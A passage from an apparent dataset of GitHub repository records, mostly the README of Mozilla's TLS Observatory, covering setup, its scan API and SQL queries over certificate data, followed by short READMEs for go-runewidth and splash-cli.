Deployed](https://img.shields.io/badge/whatsdeployed-stage,prod-green.svg)](https://whatsdeployed.io/s-LVL)\n[![CircleCI](https://circleci.com/gh/mozilla/tls-observatory/tree/master.svg?style=svg)](https://circleci.com/gh/mozilla/tls-observatory/tree/master)\n\nThe Mozilla TLS Observatory is a suite of tools for analysis and inspection on Transport Layer Security (TLS) services. The components of TLS Observatory include:\n\n- [EV Checker](https://tls-observatory.services.mozilla.com/static/ev-checker.html) - Tool for Certificate Authorities (CAs) who request a root certificate enabled for Extended Validation (EV).\n- [Certificate Explainer](https://tls-observatory.services.mozilla.com/static/certsplainer.html) - Web UI that parses fields of X.509 certificates\n- `tlsobs` - CLI tool for issuing scans of a website\n- `tlsobs-api` - HTTP webserver receiving website scan requests and displaying results\n- `tlsobs-runner` - Service that schedules website scans\n- `tlsobs-scanner` - Service that performs scans and analysis of websites\n\nWant the WebUI? 
Check out [Mozilla's Observatory](https://observatory.mozilla.org) !\n\n* [Mozilla TLS Observatory](#mozilla-tls-observatory)\n * [Getting started](#getting-started)\n * [Using the tlsobs client from Docker](#using-the-tlsobs-client-from-docker)\n * [Developing](#developing)\n * [Create the database](#create-the-database)\n * [Starting the API and Scanner](#starting-the-api-and-scanner)\n * [Run a scan locally](#run-a-scan-locally)\n * [Configuration](#configuration)\n * [tlsobs-api](#tlsobs-api)\n * [tlsobs-scanner](#tlsobs-scanner)\n * [tlsobs-runner](#tlsobs-runner)\n * [API Endpoints](#api-endpoints)\n * [POST /api/v1/scan](#post-apiv1scan)\n * [GET /api/v1/results](#get-apiv1results)\n * [GET /api/v1/certificate](#get-apiv1certificate)\n * [POST /api/v1/certificate](#post-apiv1certificate)\n * [GET /api/v1/paths](#get-apiv1paths)\n * [GET /api/v1/truststore](#get-apiv1truststore)\n * [GET /api/v1/issuereecount](#get-apiv1issuereecount)\n * [GET /api/v1/__heartbeat__](#get-apiv1heartbeat)\n * [GET /api/v1/__stats__](#get-apiv1stats)\n * [Database Queries](#database-queries)\n * [Core contributors](#contributors)\n * [License](#license)\n\n## Getting started\n\nYou can use the TLS Observatory to compare your site against the mozilla guidelines.\nIt requires Golang 1.15+ to be installed:\n\n```bash\n$ go version\ngo version go1.15 linux/amd64\n\n$ export GOPATH=\"$HOME/go\"\n$ mkdir $GOPATH\n\n$ export PATH=$GOPATH/bin:$PATH\n```\n\nThen get the binary:\n\n```bash\n$ go get github.com/mozilla/tls-observatory/tlsobs\n```\n\nAnd scan using our hosted service:\n\n```bash\n$ tlsobs tls-observatory.services.mozilla.com\nScanning tls-observatory.services.mozilla.com (id 13528951)\nRetrieving cached results from 20h33m1.379461888s ago. To run a new scan, use '-r'.\n\n--- Certificate ---\nSubject C=US, O=Mozilla Corporation, CN=tls-observatory.services.mozilla.com\nSubjectAlternativeName\n- tls-observatory.services.mozilla.com\nValidity 2016-01-20T00:00:00Z to 2017-01-24T12:00:00Z\nSHA1 FECA3CA0F4B726D062A76F47635DD94A37985105\nSHA256 315A8212CBDC76FF87AEB2161EDAA86E322F7C18B27152B5CB9206297F3D3A5D\nSigAlg ECDSAWithSHA256\nKey ECDSA 384bits P-384\nID 1281826\n\n--- Trust ---\nMozilla Microsoft Apple Android\n \u2713 \u2713 \u2713 \u2713\n\n--- Chain of trust ---\nC=US, O=Mozilla Corporation, CN=tls-observatory.services.mozilla.com (id=1281826)\n\u2514\u2500\u2500C=US, O=DigiCert Inc, CN=DigiCert ECC Secure Server CA (id=5922)\n \u2514\u2500\u2500C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Global Root CA (id=41)\n\n\n\n--- Ciphers Evaluation ---\nprio cipher protocols pfs curves\n1 ECDHE-ECDSA-AES128-GCM-SHA256 TLSv1.2 ECDH,P-256,256bits prime256v1\n2 ECDHE-ECDSA-AES256-GCM-SHA384 TLSv1.2 ECDH,P-256,256bits prime256v1\nOCSP Stapling false\nServer Side Ordering true\nCurves Fallback false\n\n--- Analyzers ---\n* Mozilla evaluation: modern\n - for modern level: consider adding ciphers ECDHE-RSA-AES256-GCM-SHA384, ECDHE-ECDSA-CHACHA20-POLY1305, ECDHE-RSA-CHACHA20-POLY1305, ECDHE-RSA-AES128-GCM-SHA256, ECDHE-ECDSA-AES256-SHA384, ECDHE-RSA-AES256-SHA384, ECDHE-ECDSA-AES128-SHA256, ECDHE-RSA-AES128-SHA256\n - for modern level: consider enabling OCSP stapling\n - for modern level: increase priority of ECDHE-ECDSA-AES256-GCM-SHA384 over ECDHE-ECDSA-AES128-GCM-SHA256\n - for modern level: fix ciphersuite ordering, use recommended modern ciphersuite\n - oldest clients: Firefox 27, Chrome 30, IE 11 on Windows 7, Edge 1, Opera 17, Safari 9, Android 5.0, Java 8\n* Grade: A (93/100)\n```\n\nThe 
analysis at the end tell you what need to be changed to reach the old, intermediate or modern level. We recommend to target the intermediate level by default, and modern if you don't care about old clients.\n\n### Using the tlsobs client from Docker\n\nA docker container also exists that contains the CLI, API, Scanner and Runner.\nFetch is from `docker pull mozilla/tls-observatory`.\n\n```bash\n$ docker pull mozilla/tls-observatory\n$ docker run -it mozilla/tls-observatory tlsobs accounts.firefox.com\n```\n\n## Developing\n\nYou can use the Kubernetes configuration provided in https://github.com/mozilla/tls-observatory/tree/master/kubernetes , or alternatively, you can do the following:\n\nYou can use the `mozilla/tls-observatory` docker container for development:\n\n```bash\n$ docker pull mozilla/tls-observatory\n$ docker run -it mozilla/tls-observatory /bin/bash\nroot@05676e6789dd:~# cd $GOPATH/src/github.com/mozilla/tls-observatory\nroot@05676e6789dd:/go/src/github.com/mozilla/tls-observatory# make\n```\n\nHowever, even with the docker container, you will need to setup your own\npostgresql database. See below.\n\nTo build a development environment from scratch, you will need Go 1.15 or above.\nYou can set it up on your own machine or via the `golang:1.15` Docker\ncontainer.\n\nRetrieve a copy of the source code using `go get`, to place it directly\nunder `$GOPATH/src/github.com/mozilla/tls-observatory`, then use `make`\nto build all components.\n\n```bash\n$ docker run -it golang:1.15\n\nroot@c63f11b8852b:/go# go get github.com/mozilla/tls-observatory\npackage github.com/mozilla/tls-observatory: no buildable Go source files in /go/src/github.com/mozilla/tls-observatory\n\nroot@c63f11b8852b:/go# cd $GOPATH/src/github.com/mozilla/tls-observatory\n\nroot@c63f11b8852b:/go/src/github.com/mozilla/tls-observatory# make\n```\n\n`make` runs the tests and compiles the scanner, api, command line client\nand runner. The resulting binaries are placed under `$GOPATH/bin`.\n\n### Create the database\n\nTLS Observatory uses PostgreSQL > 9.4. To create a database, use the\nschema in `database/schema.sql`.\n\n```bash\npostgres=# create database observatory;\nCREATE DATABASE\n\npostgres=# \\c observatory\nYou are now connected to database \"observatory\" as user \"postgres\".\n\npostgres=# \\i /go/src/github.com/mozilla/tls-observatory/database/schema.sql\n```\n\nThis automatically creates all tables, indexes, users and grants to work\nwith the default configuration.\n\n### Starting the API and Scanner\n\nFirst symlink the configuration to /etc/observatory and the cipherscan\nexecutable to /opt/cipherscan, as follows:\n\n```bash\nroot@c63f11b8852b:/# ln -s $GOPATH/src/github.com/mozilla/tls-observatory/conf /etc/tls-observatory\nroot@c63f11b8852b:/# ln -s $GOPATH/src/github.com/mozilla/tls-observatory/cipherscan /opt/cipherscan\n```\n\nThen start `tlsobs-api` and `tlsobs-scanner`. The API will listen on port 8083,\non localhost (or 172.17.0.2 if you're running in Docker).\n\n### Run a scan locally\n\nTo run a scan using the local scanner, set the `-observatory` flag of the `tlsobs`\nclient to use the local API, as follows:\n\n```bash\n$ tlsobs -observatory http://172.17.0.2:8083 ulfr.io\n```\n\n### Configuration\n\n#### tlsobs-api\n\nCustomize the configuration file under `conf/api.cfg` and using the following\nenvironment variables:\n\n* `TLSOBS_API_ENABLE` set to `on` or `off` to enable or disable the API\n* `TLSOBS_POSTGRES` is the hostname or IP of the database server (eg. 
`mypostgresdb.example.net`)\n* `TLSOBS_POSTGRESDB` is the name of the database (eg. `observatory`)\n* `TLSOBS_POSTGRESUSER` is the database user (eg. `tlsobsapi`)\n* `TLSOBS_POSTGRESPASS` is the database user password (eg. `mysecretpassphrase`)\n\n#### tlsobs-scanner\n\nCustomize the configuration file under `conf/scanner.cfg` and using the\nfollowing environment variables:\n\n* `TLS_AWSCERTLINT_DIR` set where awslabs/certlint directory exists\n* `TLSOBS_SCANNER_ENABLE` set to `on` or `off` to enable or disable the scabber\n* `TLSOBS_POSTGRES` is the hostname or IP of the database server (eg. `mypostgresdb.example.net`)\n* `TLSOBS_POSTGRESDB` is the name of the database (eg. `observatory`)\n* `TLSOBS_POSTGRESUSER` is the database user (eg. `tlsobsscanner`)\n* `TLSOBS_POSTGRESPASS` is the database user password (eg. `mysecretpassphrase`)\n\n#### tlsobs-runner\n\nRuns regular tests against target sites and sends notifications.\n\nSee `conf/runner.yaml` for an example of configuration. Some configuration\nparameters can also be provided through environment variables:\n\n* `TLSOBS_RUNNER_SMTP_HOST` is the hostname of the smtp server (eg. `mypostfix.example.net`)\n* `TLSOBS_RUNNER_SMTP_PORT` is the port of the smtp server (eg. `587`)\n* `TLSOBS_RUNNER_SMTP_FROM` is the from address of email notifications sent by the runner (eg. `mynotification@tlsobservatory.example.net`)\n* `TLSOBS_RUNNER_SMTP_AUTH_USER` is the smtp authenticated username (eg `tlsobsrunner`)\n* `TLSOBS_RUNNER_SMTP_AUTH_PASS` is the smtp user password (eg. `mysecretpassphrase`)\n* `TLSOBS_RUNNER_SLACK_WEBHOOK` is the slack webhook (eg. `https://hooks.slack.com/services/not/a/realwebhook`)\n* `TLSOBS_RUNNER_SLACK_USERNAME` is the what the message sender's username will be (eg. `tlsbot`)\n* `TLSOBS_RUNNER_SLACK_ICONEMOJI` is the what the message sender's icon will be (eg. `:telescope:`)\n\n## API Endpoints\n\n### POST /api/v1/scan\n\nSchedule a scan of a given target.\n\n```bash\n$ curl -X POST 'https://tls-observatory.services.mozilla.com/api/v1/scan?target=ulfr.io&rescan=true'\n```\n\n**Parameters**:\n\n* `target` is the FQDN of the target site. eg. `google.com`. Do not use protocol handlers or query strings.\n* `rescan` asks for a rescan of the target when set to true.\n* `params` JSON object in which each key represents one of TLS Observatory's workers. The value under each key will be passed as the parameters to the corresponding worker. For example, `{\"ev-checker\": {\"oid\": \"foo\"}}` will pass `{\"oid\": \"foo\"}` to the ev-checker worker. 
The following workers accept parameters:\n * ev-checker: Expects a JSON object with the following keys:\n * oid: the oid of the EV policy to check\n * rootCertificate: the root certificate to check against, in PEM format\n\nFor example, with curl:\n\n```\ncurl -X POST \"http://localhost:8083/api/v1/scan?target=mozilla.org&rescan=true¶ms=%7B%0A%20%20%22ev-checker%22%3A%20%7B%0A%20%20%22rootcertificate%22%3A%20%22-----BEGIN%20CERTIFICATE-----%5CnMIIDxTCCAq2gAwIBAgIQAqxcJmoLQJuPC3nyrkYldzANBgkqhkiG9w0BAQUFADBs%5CnMQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3%5Cnd3cuZGlnaWNlcnQuY29tMSswKQYDVQQDEyJEaWdpQ2VydCBIaWdoIEFzc3VyYW5j%5CnZSBFViBSb290IENBMB4XDTA2MTExMDAwMDAwMFoXDTMxMTExMDAwMDAwMFowbDEL%5CnMAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQd3d3%5CnLmRpZ2ljZXJ0LmNvbTErMCkGA1UEAxMiRGlnaUNlcnQgSGlnaCBBc3N1cmFuY2Ug%5CnRVYgUm9vdCBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMbM5XPm%5Cn%2B9S75S0tMqbf5YE%2Fyc0lSbZxKsPVlDRnogocsF9ppkCxxLeyj9CYpKlBWTrT3JTW%5CnPNt0OKRKzE0lgvdKpVMSOO7zSW1xkX5jtqumX8OkhPhPYlG%2B%2BMXs2ziS4wblCJEM%5CnxChBVfvLWokVfnHoNb9Ncgk9vjo4UFt3MRuNs8ckRZqnrG0AFFoEt7oT61EKmEFB%5CnIk5lYYeBQVCmeVyJ3hlKV9Uu5l0cUyx%2BmM0aBhakaHPQNAQTXKFx01p8VdteZOE3%5CnhzBWBOURtCmAEvF5OYiiAhF8J2a3iLd48soKqDirCmTCv2ZdlYTBoSUeh10aUAsg%5CnEsxBu24LUTi4S8sCAwEAAaNjMGEwDgYDVR0PAQH%2FBAQDAgGGMA8GA1UdEwEB%2FwQF%5CnMAMBAf8wHQYDVR0OBBYEFLE%2Bw2kD%2BL9HAdSYJhoIAu9jZCvDMB8GA1UdIwQYMBaA%5CnFLE%2Bw2kD%2BL9HAdSYJhoIAu9jZCvDMA0GCSqGSIb3DQEBBQUAA4IBAQAcGgaX3Nec%5CnnzyIZgYIVyHbIUf4KmeqvxgydkAQV8GK83rZEWWONfqe%2FEW1ntlMMUu4kehDLI6z%5CneM7b41N5cdblIZQB2lWHmiRk9opmzN6cN82oNLFpmyPInngiK3BD41VHMWEZ71jF%5CnhS9OMPagMRYjyOfiZRYzy78aG6A9%2BMpeizGLYAiJLQwGXFK3xPkKmNEVX58Svnw2%5CnYzi9RKR%2F5CYrCsSXaQ3pjOLAEFe4yHYSkVXySGnYvCoCWw9E1CAx2%2FS6cCZdkGCe%5CnvEsXCS%2B0yx5DaMkHJ8HSXPfqIbloEpw8nL%2Be%2FIBcm2PN7EeqJSdnoDfzAIJ9VNep%5Cn%2BOkuE6N36B9K%5Cn-----END%20CERTIFICATE-----%22%2C%0A%20%20%22oid%22%3A%20%222.16.840.1.114412.22.1%22%0A%7D%0A%7D\"\n```\n\n**Output**: a `json` document containing the Scan ID.\n\n**Caching**: When `rescan` is not `true`, if a scan of the target was done over the last 24 hours, the scan ID is returned. Use `rescan=true` to force a rescan within 24 hours of the previous scan.\n\n**Rate Limits**: Each target can only be scanned every 3 minutes with `rescan=true`.\n\n### GET /api/v1/results\n\nRetrieve scan results by its ID.\n\n```bash\ncurl https://tls-observatory.services.mozilla.com/api/v1/results?id=12302333\n```\n\n**Parameters**:\n\n* `id` is the Scan ID\n\n**Output**: a `json` document containing the scan results and the ID of the end-entity certificate.\n\n### GET /api/v1/certificate\n\nRetrieve a certificate by its ID.\n\n```bash\ncurl https://tls-observatory.services.mozilla.com/api/v1/certificate?id=1\n```\n\n**Parameters**:\n\n* `id` is the Certificate ID\n* `sha256` the hexadecimal checksum of the DER certificate (only if `id` is not\n provided)\n\n**Output**: a `json` document containing the parsed certificate and its raw X509 version encoded with base64.\n\n### POST /api/v1/certificate\n\nPublish a certificate.\n\n```bash\ncurl -X POST -F certificate=@example.pem https://tls-observatory.services.mozilla.com/api/v1/certificate\n```\n\n**Parameters**:\n\n* `certificate` is a POST multipart/form-data parameter that contains the PEM encoded certificate.\n\n**Output**: a `json` document containing the parsed certificate and its raw X509 version encoded with base64.\n\n**Caching**: Certificates are only stored once. 
The database uses the SHA256 hash of the DER (binary) certificate to identify duplicates. Posting a certificate already stored in database returns the stored version.\n\n### GET /api/v1/paths\n\nRetrieve the paths from a certificate to one of multiple roots.\n\n```bash\ncurl https://tls-observatory.services.mozilla.com/api/v1/paths?id=1\n```\n\n**Parameters**:\n\n* `id` is the ID of the certificate to start the path at.\n* `sha256` the hexadecimal checksum of the DER certificate (only if `id` is not\n provided)\n\n**Output**: a `json` document containing the paths document. Each entry in the path contains the current certificate and an array of parents, if any exist.\n\n### GET /api/v1/truststore\n\nRetrieve all the certificates in a given truststore.\n\n```bash\ncurl https://tls-observatory.services.mozilla.com/api/v1/truststore?store=mozilla&format=pem\n```\n\n**Parameters**:\n\n* `store` is the store to retrieve certificates from. \"mozilla\", \"android\", \"apple\", \"microsoft\" and \"ubuntu\" are allowed.\n* `format`, either \"pem\" or \"json\".\n\n**Output**: if `format` is pem, a series of PEM-format certificates. If `format` is json, a json array of certificate objects, each with the same format of `/api/v1/certificate`.\n\n### GET /api/v1/issuereecount\n\nRetrieve the count of end-entity certificates that chain to the specified certificate. This is used to evaluate weight of a given issuer in the web pki.\n\n```bash\ncurl https://tls-observatory.services.mozilla.com/api/v1/issuereecount?id=1\n```\n\n**Parameters**:\n\n* `id` is the ID of the certificate to start the path at.\n* `sha256` the hexadecimal checksum of the DER certificate (only if `id` is not\n provided)\n\n**Output**: a `json` document containing the certificate itself under `issuer` and the count of end-entity certs under `eecount`.\n\n\n### GET /api/v1/__heartbeat__\n\nReturns a 200 OK.\n\n```bash\ncurl https://tls-observatory.services.mozilla.com/api/v1/__heartbeat__\nI iz alive.\n```\n\n### GET /api/v1/__stats__\n\nReturns usage statistics in json (default) or text format.\n\nBy default, this endpoint returns stale data, refreshed the last time the\nendpoint was called, so it's possible to not have the latest available\nstatistics. 
Use the query parameter `details=full` to get the real-time stats,\nbut be aware that this is expensive and often times out.\n\n```bash\ncurl https://tls-observatory.services.mozilla.com/api/v1/__stats__?format=text&details=full\n\npending scans: 7\n\nlast 24 hours\n-------------\n- distinct targets: 21873\n- certs seen: 16459\n- certs added: 7886\n\nhourly scans\n------------\n2017-02-08T15:00:00Z 5\n2017-02-08T14:00:00Z 64\n2017-02-08T13:00:00Z 928\n2017-02-08T12:00:00Z 1969\n2017-02-08T11:00:00Z 1957\n2017-02-08T10:00:00Z 1982\n2017-02-08T09:00:00Z 2013\n2017-02-08T08:00:00Z 2031\n2017-02-08T07:00:00Z 2153\n2017-02-08T06:00:00Z 1860\n2017-02-08T05:00:00Z 1869\n2017-02-08T04:00:00Z 1944\n2017-02-08T03:00:00Z 1959\n2017-02-08T02:00:00Z 907\n2017-02-08T01:00:00Z 32\n2017-02-08T00:00:00Z 55\n2017-02-07T23:00:00Z 41\n2017-02-07T22:00:00Z 46\n2017-02-07T21:00:00Z 60\n2017-02-07T20:00:00Z 76\n2017-02-07T19:00:00Z 66\n2017-02-07T18:00:00Z 67\n2017-02-07T17:00:00Z 56\n```\n\n## Database Queries\n\n### Find certificates signed by CAs identified by their SHA256 fingerprint\n\n```sql\nSELECT certificates.id, certificates.subject, certificates.issuer\nFROM certificates INNER JOIN trust ON (certificates.id=trust.cert_id)\nWHERE trust.issuer_id in (\n SELECT id FROM certificates\n WHERE sha256_fingerprint IN (\n 'E7685634EFACF69ACE939A6B255B7B4FABEF42935B50A265ACB5CB6027E44E70',\n 'A4B6B3996FC2F306B3FD8681BD63413D8C5009CC4FA329C2CCF0E2FA1B140305'\n ))\nAND certificates.is_ca='false';\n```\n\n### List signature algorithms of trusted certs\n\n```sql\nSELECT signature_algo, count(*)\nFROM certificates INNER JOIN trust ON (certificates.id=trust.cert_id)\nWHERE is_ca='false'\nAND trust.trusted_mozilla='true'\nGROUP BY signature_algo\nORDER BY count(*) DESC;\n```\n\n### Show expiration dates of trusted SHA-1 certificates\n\n```sql\nSELECT extract('year' FROM date_trunc('year', not_valid_after)) as expiration_year,\n extract('month' FROM date_trunc('month', not_valid_after)) as expiration_month,\n count(*)\nFROM certificates\n INNER JOIN trust ON (certificates.id=trust.cert_id)\nWHERE is_ca='false'\n AND trust.trusted_mozilla='true'\n AND signature_algo='SHA1WithRSA'\nGROUP BY date_trunc('year', not_valid_after),\n date_trunc('month', not_valid_after)\nORDER BY date_trunc('year', not_valid_after) ASC,\n date_trunc('month', not_valid_after) ASC;\n```\n\n### Count trusted SHA-1 certs seen over the last month on TOP1M sites\n\n```sql\nSELECT distinct(certificates.id) as \"id\", cisco_umbrella_rank, domains, not_valid_before, not_valid_after, last_seen, signature_algo\nFROM certificates\n INNER JOIN trust ON (certificates.id=trust.cert_id)\nWHERE is_ca='false'\n AND trust.trusted_mozilla='true'\n AND signature_algo='SHA1WithRSA'\n AND cisco_umbrella_rank < 1000000\n AND last_seen > NOW() - INTERVAL '1 month'\n AND not_valid_after > NOW()\nORDER BY cisco_umbrella_rank ASC;\n```\n\n### List issuer, subject and SAN of Mozilla|Firefox certs not issued by Digicert\n\n```sql\nSELECT certificates.id,\n issuer->'o'->>0 AS Issuer,\n subject->>'cn' AS Subject,\n san AS SubjectAltName\nFROM certificates\n INNER JOIN trust ON (trust.cert_id=certificates.id),\n jsonb_array_elements_text(x509_subjectAltName) AS san\nWHERE jsonb_typeof(x509_subjectAltName) != 'null'\n AND ( subject#>>'{cn}' ~ '\\.(firefox|mozilla)\\.'\n OR\n san ~ '\\.(firefox|mozilla)\\.'\n )\n AND trust.trusted_mozilla='true'\n AND certificates.not_valid_after>now()\n AND cast(issuer#>>'{o}' AS text) NOT LIKE '%DigiCert Inc%'\nGROUP BY certificates.id, 
san\nORDER BY certificates.id ASC;\n```\n\n### Find count of targets that support the SEED-SHA ciphersuite\n\n```sql\nSELECT COUNT(DISTINCT(target))\nFROM scans, jsonb_array_elements(conn_info->'ciphersuite') as ciphersuites\nWHERE jsonb_typeof(conn_info) != 'null'\nAND ciphersuites->>'cipher'='SEED-SHA';\n```\n\n### Find intermediate CA certs whose root is trusted by Mozilla\n\n```sql\nSELECT id, subject\nFROM certificates\nWHERE is_ca=True\n AND subject!=issuer\n AND issuer IN (\n SELECT subject\n FROM certificates\n WHERE in_mozilla_root_store=True\n )\nGROUP BY subject, sha256_fingerprint;\n```\n\n### Find CA certs treated as EV in Firefox\n\nThe list is CA Certs that get EV treatment in Firefox can be [found here](https://dxr.mozilla.org/mozilla-central/source/security/certverifier/ExtendedValidation.cpp).\n\n```sql\nSELECT id, subject\nFROM certificates,\n jsonb_array_elements_text(x509_certificatePolicies) AS cpol\nWHERE jsonb_typeof(x509_certificatePolicies) != 'null'\n AND cpol IN ('1.2.392.200091.100.721.1','1.2.616.1.113527.2.5.1.1','1.3.159.1.17.1',\n '1.3.6.1.4.1.13177.10.1.3.10','1.3.6.1.4.1.13769.666.666.666.1.500.9.1',\n '1.3.6.1.4.1.14370.1.6','1.3.6.1.4.1.14777.6.1.1','1.3.6.1.4.1.14777.6.1.2',\n '1.3.6.1.4.1.17326.10.14.2.1.2','1.3.6.1.4.1.17326.10.8.12.1.2',\n '1.3.6.1.4.1.22234.2.14.3.11','1.3.6.1.4.1.22234.2.5.2.3.1',\n '1.3.6.1.4.1.22234.3.5.3.1','1.3.6.1.4.1.22234.3.5.3.2','1.3.6.1.4.1.23223.1.1.1',\n '1.3.6.1.4.1.29836.1.10','1.3.6.1.4.1.34697.2.1','1.3.6.1.4.1.34697.2.2',\n '1.3.6.1.4.1.34697.2.3','1.3.6.1.4.1.34697.2.4','1.3.6.1.4.1.36305.2',\n '1.3.6.1.4.1.40869.1.1.22.3','1.3.6.1.4.1.4146.1.1','1.3.6.1.4.1.4788.2.202.1',\n '1.3.6.1.4.1.6334.1.100.1','1.3.6.1.4.1.6449.1.2.1.5.1','1.3.6.1.4.1.782.1.2.1.8.1',\n '1.3.6.1.4.1.7879.13.24.1','1.3.6.1.4.1.8024.0.2.100.1.2','2.16.156.112554.3',\n '2.16.528.1.1003.1.2.7','2.16.578.1.26.1.3.3','2.16.756.1.83.21.0',\n '2.16.756.1.89.1.2.1.1','2.16.756.5.14.7.4.8','2.16.792.3.0.3.1.1.5',\n '2.16.792.3.0.4.1.1.4','2.16.840.1.113733.1.7.23.6','2.16.840.1.113733.1.7.48.1',\n '2.16.840.1.114028.10.1.2','2.16.840.1.114404.1.1.2.4.1','2.16.840.1.114412.2.1',\n '2.16.840.1.114413.1.7.23.3','2.16.840.1.114414.1.7.23.3')\n AND is_ca='true';\n```\n\n### Evaluate the quality of TLS configurations of top sites\n\nThis query uses the top1m ranking analyzer to retrieve the Mozilla evaluation of top sites.\n\n```sql\nobservatory=> SELECT COUNT(DISTINCT(target)), output->>'level' AS \"Mozilla Configuration\"\nFROM scans\n INNER JOIN analysis ON (scans.id=analysis.scan_id)\nWHERE has_tls=true\n AND target IN ( SELECT target\n FROM scans\n INNER JOIN analysis ON (scans.id=analysis.scan_id)\n WHERE worker_name='top1m'\n AND CAST(output->'target'->>'rank' AS INTEGER) < 10000\n AND timestamp > NOW() - INTERVAL '1 month')\n AND worker_name='mozillaEvaluationWorker'\n AND timestamp > NOW() - INTERVAL '1 month'\nGROUP BY has_tls, output->>'level'\nORDER BY COUNT(DISTINCT(target)) DESC;\n\n count | Mozilla Configuration\n-------+-----------------------\n 3689 | intermediate\n 1906 | non compliant\n 1570 | bad\n 15 | old\n(4 rows)\n\n```\n\n### Count Top 1M sites that support RC4\n```sql\nSELECT COUNT(DISTINCT(target))\nFROM scans,\n jsonb_array_elements(conn_info->'ciphersuite') as ciphersuites\nWHERE jsonb_typeof(conn_info) = 'object'\n AND jsonb_typeof(conn_info->'ciphersuite') = 'array'\n AND ciphersuites->>'cipher' LIKE 'RC4-%'\n AND target IN ( SELECT target\n FROM scans\n INNER JOIN analysis ON (scans.id=analysis.scan_id)\n WHERE 
worker_name='top1m'\n AND CAST(output->'target'->>'rank' AS INTEGER) < 1000000\n AND timestamp > NOW() - INTERVAL '1 month')\n AND timestamp > NOW() - INTERVAL '1 month';\n ```\n\n### Count Top 1M sites that support TLSv1.2\n```sql\nSELECT ciphersuites->'protocols' @> '[\"TLSv1.2\"]'::jsonb AS \"Support TLS 1.2\", COUNT(DISTINCT(target))\nFROM scans,\n jsonb_array_elements(conn_info->'ciphersuite') as ciphersuites\nWHERE jsonb_typeof(conn_info) = 'object'\n AND jsonb_typeof(conn_info->'ciphersuite') = 'array'\n AND target IN ( SELECT target\n FROM scans\n INNER JOIN analysis ON (scans.id=analysis.scan_id)\n WHERE worker_name='top1m'\n AND CAST(output->'target'->>'rank' AS INTEGER) < 1000000\n AND timestamp > NOW() - INTERVAL '1 month')\n AND timestamp > NOW() - INTERVAL '1 month'\nGROUP BY ciphersuites->'protocols' @> '[\"TLSv1.2\"]'::jsonb;\n```\n\n### Count end-entity certificates by issuer organizations\n```sql\nSELECT COUNT(*), issuer#>'{o}'->>0\nFROM certificates\n INNER JOIN trust ON (certificates.id=trust.cert_id)\nWHERE certificates.is_ca = false\n AND trust.trusted_mozilla=true\n AND trust.is_current = true\nGROUP BY issuer#>'{o}'->>0\nORDER BY count(*) DESC;\n```\n\n### Count sites in the top 10k that are impacted by the Symantec distrust in Firefox 60\nnote: in Firefox 63, the not_valid_before condition will be removed\n```sql\nSELECT COUNT(DISTINCT(target))\nFROM scans\n INNER JOIN analysis ON (scans.id=analysis.scan_id)\n INNER JOIN certificates ON (scans.cert_id=certificates.id)\nWHERE has_tls=true\n AND target IN ( SELECT target\n FROM scans\n INNER JOIN analysis ON (scans.id=analysis.scan_id)\n WHERE worker_name='top1m'\n AND CAST(output->'target'->>'rank' AS INTEGER) < 10000\n AND timestamp > NOW() - INTERVAL '1 week')\n AND worker_name='symantecDistrust'\n AND timestamp > NOW() - INTERVAL '1 week'\n AND not_valid_before < '2016-06-01'\nGROUP BY has_tls, output->>'isDistrusted'\nORDER BY COUNT(DISTINCT(target)) DESC;\n```\n\n## Contributing\n\nWe're always happy to help new contributors. 
You can find us in `#observatory` on `irc.mozilla.org` ([Mozilla Wiki](https://wiki.mozilla.org/IRC)).\n\n### Dependencies\n\nWe currently vendor dependencies in `vendor/`.\n\nUsing a golang version with [`go mod`](https://golang.org/ref/mod#mod-commands),run `make vendor` update vendored dependencies.\n\n## Contributors\n\n * Julien Vehent\n * Dimitris Bachtis (original dev)\n * Adrian Utrilla\n\n## License\n\n * Mozilla Public License Version 2.0\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mattn/go-runewidth", "link": "https://github.com/mattn/go-runewidth", "tags": ["golang", "go", "windows", "wcwidth"], "stars": 511, "description": "wcwidth for golang", "lang": "Go", "repo_lang": "", "readme": "go-runewidth\n============\n\n[![Build Status](https://github.com/mattn/go-runewidth/workflows/test/badge.svg?branch=master)](https://github.com/mattn/go-runewidth/actions?query=workflow%3Atest)\n[![Codecov](https://codecov.io/gh/mattn/go-runewidth/branch/master/graph/badge.svg)](https://codecov.io/gh/mattn/go-runewidth)\n[![GoDoc](https://godoc.org/github.com/mattn/go-runewidth?status.svg)](http://godoc.org/github.com/mattn/go-runewidth)\n[![Go Report Card](https://goreportcard.com/badge/github.com/mattn/go-runewidth)](https://goreportcard.com/report/github.com/mattn/go-runewidth)\n\nProvides functions to get fixed width of the character or string.\n\nUsage\n-----\n\n```go\nrunewidth.StringWidth(\"\u3064\u306e\u3060\u2606HIRO\") == 12\n```\n\n\nAuthor\n------\n\nYasuhiro Matsumoto\n\nLicense\n-------\n\nunder the MIT License: http://mattn.mit-license.org/2013\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "splash-cli/splash-cli", "link": "https://github.com/splash-cli/splash-cli", "tags": ["wallpaper", "beautiful-photos", "unsplash", "photography", "photos", "cli", "beautiful-wallpapers", "splash", "download-photos", "change-wallpaper", "wallpapers"], "stars": 511, "description": "A simple, CLI to download Unsplash wallpapers. Nothing fancy \u2014 it just works.", "lang": "Go", "repo_lang": "", "readme": "# Splash CLI v4\n[![Go](https://github.com/splash-cli/splash-cli/actions/workflows/go.yml/badge.svg?branch=go-rewrite)](https://github.com/splash-cli/splash-cli/actions/workflows/go.yml)\n> Are you looking for the v3.x `splash-cli`? Check out the [master](https://github.com/splash-cli/splash-cli/tree/master) branch\n\n\n\t\n![splash-cli](https://socialify.git.ci/splash-cli/splash-cli/image?description=1&language=1&owner=1&pattern=Brick%20Wall&theme=Dark)\t\n\n\n

\n[Badges: \"Website\", \"Buy\", \"stars_spark\"]\n\nGet stunning wallpapers from Unsplash
\n
